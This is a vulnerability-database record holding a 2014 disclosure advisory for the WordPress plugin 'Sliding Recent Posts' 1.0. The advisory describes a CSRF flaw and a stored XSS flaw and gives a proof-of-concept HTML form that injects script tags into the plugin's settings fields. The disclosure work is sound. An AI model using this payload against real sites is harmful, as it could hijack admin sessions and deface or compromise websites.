{"id": "PACKETSTORM:129504", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "WordPress Sliding Recent Posts 1.0 CSRF / XSS", "description": "", "published": "2014-12-12T00:00:00", "modified": "2014-12-12T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/129504/WordPress-Sliding-Recent-Posts-1.0-CSRF-XSS.html", "reporter": "Morten Nortoft", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2016-11-03T10:15:55", "viewCount": 13, "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "_state": {"dependencies": 1678911500, "score": 1678911848, "epss": 1678917342}, "_internal": {"score_hash": "5979e41841e68da7c0ae743ec7f773f3"}, "sourceHref": "https://packetstormsecurity.com/files/download/129504/wpsrp-xsrfxss.txt", "sourceData": "`Title: WordPress 'Sliding Recent Posts' plugin - CSRF/XSS \nVersion: 1.0 \nAuthor: Morten N\u00f8rtoft, Kenneth Jepsen, Mikkel Vej \nDate: 2014/12/12 \nDownload: https://wordpress.org/plugins/sliding-recent-posts/ \nNotified WordPress: 2014/11/27 \n---------------------------------------------------------------- \n \n## Description: \n---------------------------------------------------------------- \nThis plugin displays a widget on your site that slides into the screen when you click on it and displays a list of recent posts with thumbnails. \n \n## CSRF: \n---------------------------------------------------------------- \nIt is possible to change the plugin's admin settings by tricking a logged-in admin into visiting a crafted page. \n \n \n## Stored XSS: \n---------------------------------------------------------------- \nSettings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields. \n\n \nPoC: \nLog in as admin and then submit the following form. \n<form method=\"POST\" action=\"http://[DOMAIN]/wp-admin/admin.php?page=sliding-recent-posts.php\"> \n<input type=\"text\" name=\"num_posts\" value=\"3\"><br /> \n<input type=\"text\" name=\"position\" value=\"\"><script>alert(1)</script>\"><br /> \n<input type=\"text\" name=\"background_color\" value=\"#798746\"/><script>alert(2)</script>\"><br /> \n<input type=\"text\" name=\"font_color\" value=\"#ffffff\"><br /> \n<input type=\"text\" name=\"ll__opt[disable]\" value=\"Save\"><br /> \n<input type=\"text\" name=\"srp_save\" value=\"save\"><br /> \n<input type=\"submit\"> \n</form> \n \n \n## Solution \n---------------------------------------------------------------- \nNo fix has been released. \n \nWordPress has been notified and the plugin has been closed until it is updated. \n`\n"}